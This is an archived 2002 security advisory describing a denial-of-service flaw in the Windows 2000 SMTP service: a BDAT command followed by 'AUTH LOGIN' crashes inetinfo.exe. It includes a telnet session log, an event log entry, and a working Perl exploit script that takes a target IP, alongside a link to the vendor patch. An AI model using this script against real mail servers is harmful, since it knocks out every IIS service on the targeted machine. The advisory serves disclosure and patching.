Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows :: win5174.htm

windows 2000 smtp DoS



8th Mar 2002 [SBWID-5174]
COMMAND

	windows 2000 smtp DoS

SYSTEMS AFFECTED

	Windows 2000 SP1, SP2

PROBLEM

	H D Moore [http://www.digitaloffense.net] posted :
	

	I discovered a way  to  crash  the  Win2K  smtp  service  via  the  BDAT
	command, causing inetinfo to die with an access violation.
	

	...
	

	Here is a brief session log showing the bug:
	

	---

	Trying 192.168.0.58...

	Connected to 192.168.0.58.

	Escape character is \'^]\'.

	220 shattered Microsoft ESMTP MAIL Service, Version: 5.0.2195.3779 ready at  

	Mon, 12 Nov 2001 23:33:28 -0600

	HELO BISH

	250 shattered Hello [192.168.0.169]

	MAIL FROM: ERUSOLCSIDLLUF

	250 2.1.0 ERUSOLCSIDLLUF@shattered....Sender OK

	RCPT TO: PLUCYLLIS

	250 2.1.5 PLUCYLLIS@shattered

	BDAT 7

	LETRAC AUTH LOGIN

	250 CHUNK received OK, 7 Octets

	334 VXNlcm5hbWU6

	Tm90IGFub3RoZXIgbm90Y2ggb24gY3VscCdzIGJlZHBvc3Q=

	334 UGFzc3dvcmQ6

	WW91IGNhbiBnbyBhaGVhZCBhbmQgY3Jhc2ggbm93Li4u

	501 5.7.3 Cannot decode password

	500 5.3.3 Unrecognized command

	 

	<session hangs here>

	^]

	telnet> quit

	Connection closed.

	hdm@sliver:~ >

	---

	

	And here is the event log entry:
	

	Event Type:     Information

	Event Source:   Application Popup

	Event Category: None

	Event ID:       26

	User:           N/A

	Computer:       SHATTERED

	Description:

	Application popup: inetinfo.exe - Application Error : The instruction at 

	\"0x67849cce\" referenced memory at \"0x7fb0f000\". The memory could not be 

	\"read\".

	

	Click on OK to terminate the program

	Click on CANCEL to debug the program 

	

	---

	

	Basicly, placing AUTH LOGIN after the bytes  of  a  BDAT  command,  then
	hitting enter a few times crashes the service.  The  user/pass  was  not
	needed and the BDAT command can be used with only 1 byte if  so  wished.
	For instance, the following would work:
	

	BDAT 1<cr>

	XAUTH LOGIN<cr>

	(output from auth login)

	<cr>

	<cr>

	

	

	 Exploit :

	 =======

	

	#!/usr/bin/perl -w

	##################

	#

	#

	#   URL: http://www.digitaloffense.net/

	# EMAIL: hdm@digitaloffense.net

	# USAGE: ./mssmtp_dos.pl <target ip>

	#

	# Summary:

	#

	#        The Microsoft Windows 2000 Internet Mail Service is vulnerable to a

	#        Denial of Service attack through the BDAT command. If exploited, this

	#        vulnerability will cause any and all services running under IIS (the

	#        inetinfo.exe process) to become unavailable.

	#

	#

	# Solution: 

	#	

	#        http://www.microsoft.com/technet/security/bulletin/MS02-012.asp

	#

	

	use IO::Socket;

	    

	$target = shift() || \"127.0.0.1\";

	my $port = 25;

	my $rcpt = \"Administrator\";

	my $from = \"crash\\@burn.com\";

	

	my $sock = IO::Socket::INET->new (

	                                    PeerAddr => $target,

	                                    PeerPort => $port,

	                                    Proto => \'tcp\'

	                                 ) || die \"could not connect: $!\";

	

	my $banner = <$sock>;

	if ($banner !~ /^2.*/)

	{

	    print STDERR \"Error: invalid server response \'$banner\'.\\n\";

	    exit(1);

	}

	

	print $sock \"HELO $target\\r\\n\";

	$resp = <$sock>;

	

	print $sock \"MAIL FROM: $from\\r\\n\";

	$resp = <$sock>;

	

	print $sock \"RCPT TO: $rcpt\\r\\n\";

	$resp = <$sock>;

	

	print $sock \"BDAT 4\\r\\n\";

	print $sock \"b00mAUTH LOGIN\\r\\n\";

	$resp = <$sock>;

	

	print $sock \"\\r\\n\";

	print $sock \"\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n\";

	

	close($sock);

	

SOLUTION

	

	http://www.microsoft.com/technet/security/bulletin/MS02-012.asp

	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH